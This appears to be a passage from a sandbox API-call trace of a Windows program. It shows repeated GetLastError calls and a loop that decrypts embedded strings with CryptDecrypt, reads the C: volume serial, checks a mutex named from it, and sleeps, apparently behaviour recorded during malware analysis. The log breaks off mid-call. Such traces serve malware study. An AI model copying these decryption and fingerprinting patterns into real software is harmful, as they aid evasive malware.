GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.185] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] GetLastError () returned 0x0 [0035.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x21c) returned 0x2af92d0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.187] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.188] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.189] GetLastError () returned 0x0 [0035.190] GetLastError () returned 0x0 [0035.190] GetLastError () returned 0x0 [0035.190] GetLastError () returned 0x0 [0035.190] GetLastError () returned 0x0 [0035.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x86) returned 0x2af0508 [0035.190] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af0508, Size=0x92) returned 0x2af0508 [0035.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2af4910 [0035.192] WaitForMultipleObjects (nCount=0x3, lpHandles=0xcff6b4*=0x1f8, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 6 os_tid = 0x9e4 Thread: id = 7 os_tid = 0xd08 [0035.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af1258 [0035.009] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe929b0) returned 1 [0035.009] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0035.009] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1258, pdwDataLen=0x2abf9ac | out: pbData=0x2af1258, pdwDataLen=0x2abf9ac) returned 1 [0035.009] CryptDestroyKey (hKey=0xe929b0) returned 1 [0035.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1300 [0035.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af4c40 [0035.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af4c68 [0035.009] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe926b0) returned 1 [0035.009] CryptSetKeyParam (hKey=0xe926b0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0035.009] CryptDecrypt (in: hKey=0xe926b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af4c68, pdwDataLen=0x2abf984 | out: pbData=0x2af4c68, pdwDataLen=0x2abf984) returned 1 [0035.009] CryptDestroyKey (hKey=0xe926b0) returned 1 [0035.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4c68 | out: hHeap=0x2af0000) returned 1 [0035.010] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1300, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0035.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4c40 | out: hHeap=0x2af0000) returned 1 [0035.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1258 | out: hHeap=0x2af0000) returned 1 [0035.010] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1300 | out: hHeap=0x2af0000) returned 1 [0035.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1300 [0035.010] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe928b0) returned 1 [0035.010] CryptSetKeyParam (hKey=0xe928b0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0035.010] CryptDecrypt (in: hKey=0xe928b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1300, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1300, pdwDataLen=0x2abf9e0) returned 1 [0035.010] CryptDestroyKey (hKey=0xe928b0) returned 1 [0035.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af4c40 [0035.010] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x228 [0035.010] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x0) returned 0x102 [0035.010] CloseHandle (hObject=0x228) returned 1 [0035.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1300 | out: hHeap=0x2af0000) returned 1 [0035.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4c40 | out: hHeap=0x2af0000) returned 1 [0035.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af1258 [0035.010] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe929b0) returned 1 [0035.010] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0035.010] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1258, pdwDataLen=0x2abf9ac | out: pbData=0x2af1258, pdwDataLen=0x2abf9ac) returned 1 [0035.010] CryptDestroyKey (hKey=0xe929b0) returned 1 [0035.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1300 [0035.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af4c40 [0035.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af4c68 [0035.010] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe925b0) returned 1 [0035.010] CryptSetKeyParam (hKey=0xe925b0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0035.010] CryptDecrypt (in: hKey=0xe925b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af4c68, pdwDataLen=0x2abf984 | out: pbData=0x2af4c68, pdwDataLen=0x2abf984) returned 1 [0035.010] CryptDestroyKey (hKey=0xe925b0) returned 1 [0035.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4c68 | out: hHeap=0x2af0000) returned 1 [0035.011] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1300, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0035.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4c40 | out: hHeap=0x2af0000) returned 1 [0035.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1258 | out: hHeap=0x2af0000) returned 1 [0035.011] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1300 | out: hHeap=0x2af0000) returned 1 [0035.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1300 [0035.011] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92430) returned 1 [0035.011] CryptSetKeyParam (hKey=0xe92430, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0035.011] CryptDecrypt (in: hKey=0xe92430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1300, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1300, pdwDataLen=0x2abf9e0) returned 1 [0035.011] CryptDestroyKey (hKey=0xe92430) returned 1 [0035.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af4c40 [0035.011] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x228 [0035.011] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x0) returned 0x102 [0035.011] CloseHandle (hObject=0x228) returned 1 [0035.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1300 | out: hHeap=0x2af0000) returned 1 [0035.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4c40 | out: hHeap=0x2af0000) returned 1 [0035.011] Sleep (dwMilliseconds=0x3e8) [0036.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0036.033] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0036.033] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0036.033] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0036.033] CryptDestroyKey (hKey=0xe927f0) returned 1 [0036.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0036.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0036.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af86f0 [0036.034] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0036.034] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0036.034] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af86f0, pdwDataLen=0x2abf984 | out: pbData=0x2af86f0, pdwDataLen=0x2abf984) returned 1 [0036.034] CryptDestroyKey (hKey=0xe927f0) returned 1 [0036.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af86f0 | out: hHeap=0x2af0000) returned 1 [0036.034] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0036.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0036.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0036.034] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0036.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0036.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0036.034] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0036.034] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0036.034] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0036.034] CryptDestroyKey (hKey=0xe927f0) returned 1 [0036.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0036.034] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0036.034] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0036.034] CloseHandle (hObject=0x2c0) returned 1 [0036.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0036.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0036.034] Sleep (dwMilliseconds=0x3e8) [0037.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0037.059] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0037.059] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0037.059] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0037.059] CryptDestroyKey (hKey=0xe927f0) returned 1 [0037.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0037.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0037.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8a80 [0037.059] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0037.059] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0037.059] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8a80, pdwDataLen=0x2abf984 | out: pbData=0x2af8a80, pdwDataLen=0x2abf984) returned 1 [0037.059] CryptDestroyKey (hKey=0xe927f0) returned 1 [0037.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8a80 | out: hHeap=0x2af0000) returned 1 [0037.059] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0037.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0037.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0037.059] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0037.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0037.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0037.059] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0037.059] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0037.059] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0037.059] CryptDestroyKey (hKey=0xe927f0) returned 1 [0037.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0037.060] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0037.060] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0037.060] CloseHandle (hObject=0x2c0) returned 1 [0037.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0037.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0037.060] Sleep (dwMilliseconds=0x3e8) [0038.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0038.081] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0038.081] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0038.081] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0038.081] CryptDestroyKey (hKey=0xe927f0) returned 1 [0038.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0038.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0038.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af7d70 [0038.081] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0038.081] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0038.081] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af7d70, pdwDataLen=0x2abf984 | out: pbData=0x2af7d70, pdwDataLen=0x2abf984) returned 1 [0038.081] CryptDestroyKey (hKey=0xe927f0) returned 1 [0038.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7d70 | out: hHeap=0x2af0000) returned 1 [0038.081] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0038.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0038.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0038.081] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0038.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0038.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0038.081] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0038.081] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0038.081] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0038.081] CryptDestroyKey (hKey=0xe927f0) returned 1 [0038.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0038.081] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0038.082] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0038.082] CloseHandle (hObject=0x2c0) returned 1 [0038.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0038.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0038.082] Sleep (dwMilliseconds=0x3e8) [0039.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0039.098] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0039.098] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0039.098] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, 